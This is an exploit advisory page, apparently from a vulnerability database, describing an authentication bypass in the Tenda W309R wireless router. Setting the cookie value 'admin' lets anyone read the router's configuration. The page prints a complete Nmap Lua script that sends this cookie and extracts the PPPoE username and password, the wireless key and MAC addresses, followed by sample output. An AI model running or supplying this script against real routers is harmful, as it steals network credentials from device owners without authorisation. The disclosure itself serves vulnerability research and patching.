Tenda W309R Configuration Enumeration Authentication Bypass

2013.09.30
Credit: SANTHO
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

--------------------------------------------------- # Exploit Title: Tenda W309R Configuration Enumeration without Authentication # Author: SANTHO <<@s4n7h0>> # Vendor Homepage: http://www.tenda.cn # Product link: http://www.tenda.cn/tendacn/product/show.aspx?productid=382 # Category: Hardware/Wireless Router # Firmware Version : V5.07.46 --------------------------------------------------- Technical Details ~~~~~~~~~~~~~~~~~~ Tenda Wireless Router W309R doesn't have proper authentication for the web application console. Though the application asks for password, it has poor cookie management which allows a user to login even without providing the password. Application uses cookie value "admin" to access the private pages which reveals configuration details such as PPoE username, PPoE password, wireless authentication key, details of MAC addresses etc, in the source code. Exploit Code [written in Nmap Script] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ local nmap = require "nmap" local shortport = require "shortport" local table = require "table" local http = require "http" local stdnse = require 'stdnse' description = [[ Tenda W309R allows an attacker to access the configuration detailed with no authentication. Firmware Tested : V5.07.46 Thanks & Credits : Mahesh Gavkar, Samandeep Singh (@samanLEET), Amit Ghadigaonkar ]] --- --@usage -- nmap host --script http-tenda --script-args user=tenda --80/tcp open http --| http-tenda: --| PPPoE Username : home_user --| PPPoE Password : 12345 --| Wireless Password : 12345678 --| Clone MAC : AA:AA:AA:AA:AA:AA --|_ Face MAC : BB:BB:BB:BB:BB:BB --- author = "Sanoop Thomas a.k.a @s4n7h0" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"safe","discovery"} portrule = shortport.http function formatme(line) local start = string.find(line, '"') local stop = string.find(line, '";') return line:sub(start+1,stop-1) end function fetchinfo(r) local tenda = {} local param,value for line in r.body:gmatch("[^\r\n]+") do if(line:match("def_PUN = "))then table.insert(tenda,"PPPoE Username : " .. formatme(line)) end if(line:match("def_PPW ="))then table.insert(tenda,"PPPoE Password : " .. formatme(line)) end if(line:match("def_wirelesspassword ="))then table.insert(tenda,"Wireless Password : " .. formatme(line)) end if(line:match("var cln_MAC ="))then table.insert(tenda,"Clone MAC : " .. formatme(line)) end if(line:match("var fac_MAC = "))then table.insert(tenda,"Face MAC : " .. formatme(line)) end end return tenda end action = function(host, port) local user = "admin" local r local config = {} if(nmap.registry.args.user) then user = nmap.registry.args.user end local header = { cookies = user } r = http.get(host,port,'/index.asp',header) return stdnse.format_output(true, fetchinfo(r)) end PoC Output ~~~~~~~~~~~~~ root@bt# nmap 192.168.0.1 -p 80 --script http-tenda-enum Starting Nmap 6.40 ( http://nmap.org ) at 2013-09-28 17:35 Nmap scan report for 192.168.0.1 Host is up (0.0019s latency). PORT STATE SERVICE 80/tcp open http | http-tenda-enum: | PPPoE Username : home_user | PPPoE Password : 12345 | Wireless Password : 12345678 | Clone MAC : AA:AA:AA:AA:AA:AA |_ Face MAC : C8:3A:35:BB:BB:BB MAC Address: C8:3A:35:BB:BB:BB (Tenda Technology Co.) Nmap done: 1 IP address (1 host up) scanned in 2.30 seconds


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top